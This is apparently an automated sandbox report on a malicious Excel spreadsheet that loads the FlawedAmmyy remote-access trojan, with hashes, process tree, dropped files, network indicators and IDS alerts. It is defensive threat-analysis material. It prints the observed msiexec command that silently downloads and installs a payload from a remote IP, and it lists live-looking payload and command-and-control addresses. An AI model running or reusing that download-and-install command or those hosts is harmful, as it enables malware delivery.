analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

20180423 출납일보.xls

Full analysis: https://app.any.run/tasks/ed8160aa-401d-4f66-875f-079f38701e8e
Verdict: Malicious activity
Threats:

FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics.

Analysis date: April 23, 2019, 23:25:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
exe-to-msi
loader
rat
flawedammyy
ammyy
trojan
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Tue Apr 23 18:44:49 2019, Security: 0
MD5:

8ACF6C9298C8D9553A9F320AEB24D9C7

SHA1:

32D1EF20E74309A1E31A63E5B63DECECC33BC04C

SHA256:

E82DB6A27D20F09E3023FE4D2D4A5F1BA0C2CDE7E88BCFB158244919E805E0ED

SSDEEP:

3072:uKpb8rGYrMPelwhKmFV5xtezEsgrdgncwPWsqPJjRpQAJr9FuPY9BF:uKpb8rGYrMPelwhKmFV5xtuEsgrdgn6/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 460)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 460)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1184)
    • Downloads executable files from IP

      • msiexec.exe (PID: 1184)
    • Application was dropped or rewritten from another process

      • wsus.exe (PID: 2848)
      • wsus.exe (PID: 2140)
    • Connects to CnC server

      • wsus.exe (PID: 2848)
    • Loads the Task Scheduler COM API

      • MSI3316.tmp (PID: 3848)
    • FLAWEDAMMYY was detected

      • wsus.exe (PID: 2848)
    • Loads the Task Scheduler DLL interface

      • MSI3316.tmp (PID: 3848)
    • Changes the autorun value in the registry

      • MSI3316.tmp (PID: 3848)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1184)
      • MSI3316.tmp (PID: 3848)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1184)
    • Creates files in the program directory

      • MSI3316.tmp (PID: 3848)
    • Starts CMD.EXE for commands execution

      • MSI3316.tmp (PID: 3848)
    • Creates files in the Windows directory

      • MSI3316.tmp (PID: 3848)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 460)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1184)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1184)
    • Application was dropped or rewritten from another process

      • MSI3316.tmp (PID: 3848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:23 17:44:49
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
8
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi3316.tmp #FLAWEDAMMYY wsus.exe cmd.exe no specs wsus.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
460"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3896msiexec.exe STOP=1 /i http://27.102.118.143/dom1 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1184C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3848"C:\Windows\Installer\MSI3316.tmp"C:\Windows\Installer\MSI3316.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2848"C:\ProgramData\Microsofts HeIp\wsus.exe"C:\ProgramData\Microsofts HeIp\wsus.exe
MSI3316.tmp
User:
admin
Company:
Gravity
Integrity Level:
MEDIUM
Description:
Gravity Protect
Version:
7.3.1.1
3892"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI3316.tmp >> NULC:\Windows\system32\cmd.exeMSI3316.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2140"C:\ProgramData\Microsofts HeIp\wsus.exe" C:\ProgramData\Microsofts HeIp\wsus.exetaskeng.exe
User:
admin
Company:
Gravity
Integrity Level:
MEDIUM
Description:
Gravity Protect
Exit code:
0
Version:
7.3.1.1
2592"C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSI3316.tmp >> NULC:\Windows\system32\cmd.exeMSI3316.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
823
Read events
740
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
6
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
460EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR2027.tmp.cvr
MD5:
SHA256:
1184msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFCFB2B2C1B29A6E7B.TMP
MD5:
SHA256:
1184msiexec.exeC:\Config.Msi\1131ae.rbs
MD5:
SHA256:
1184msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF3A39B6BC04ADEC9F.TMP
MD5:
SHA256:
1184msiexec.exeC:\Windows\Installer\MSI2C3D.tmpexecutable
MD5:15524A83BFD4D2FDEE1239CC63113850
SHA256:50F300BF2E87A2063EEE32867B1D7F41F55F67CEC0B2F26D2D6766DCF7C459A6
1184msiexec.exeC:\Windows\Installer\MSI3316.tmpexecutable
MD5:DF03E73C0BCA68C25B7FCDD9E5912601
SHA256:388769CFE8894C84CCE9DE27EA27F31FDEEC5178DB3C27CB6E969225E7BC4669
3848MSI3316.tmpC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\1[1].tmpbinary
MD5:7DB165D593D7FCA58C44FA132E1E8283
SHA256:C2509B73DFFAE9FF0750C8F10FDA433C51212AA73898F57876418CD2252E427E
1184msiexec.exeC:\Windows\Installer\1131ad.ipibinary
MD5:81F19312824400B79598E05F866F61A0
SHA256:8423CD886014552FBCC4CD71AFC48686A4EA645582A292E243AE0F0A95FECC5F
1184msiexec.exeC:\Users\admin\AppData\Local\Temp\History\History.IE5\desktop.iniini
MD5:BA96961F5E22882527919E19DAEA510F
SHA256:DACE5AD59099429D8AED4EE279F1263EFB65D64456931398465A396CF0E79BD7
1184msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:8CE87A14F0904F1FD6D300A300831EB8
SHA256:071803F941C0891AF6144EAE8FDF855D4D5960F78211349A93CC9B81A499C0ED
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3848
MSI3316.tmp
GET
200
160.202.162.147:80
http://160.202.162.147/1.tmp
KR
binary
627 Kb
suspicious
1184
msiexec.exe
GET
200
27.102.118.143:80
http://27.102.118.143/dom1
KR
executable
156 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2848
wsus.exe
169.239.128.119:80
Zappie Host LLC
ZA
malicious
3848
MSI3316.tmp
160.202.162.147:80
Korea Telecom
KR
suspicious
1184
msiexec.exe
27.102.118.143:80
DAOU TECHNOLOGY
KR
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
1184
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
1184
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3848
MSI3316.tmp
A Network Trojan was detected
ET CURRENT_EVENTS MalDoc Request for Payload (TA505 Related)
3848
MSI3316.tmp
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
2848
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT
2848
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] AMMYY RAT
2848
wsus.exe
A Network Trojan was detected
ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin
2848
wsus.exe
A Network Trojan was detected
MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin
1 ETPRO signatures available at the full report
Process
Message
MSI3316.tmp
C:\ProgramData\Microsofts HeIp\template_133b318.DATAHASH
MSI3316.tmp
1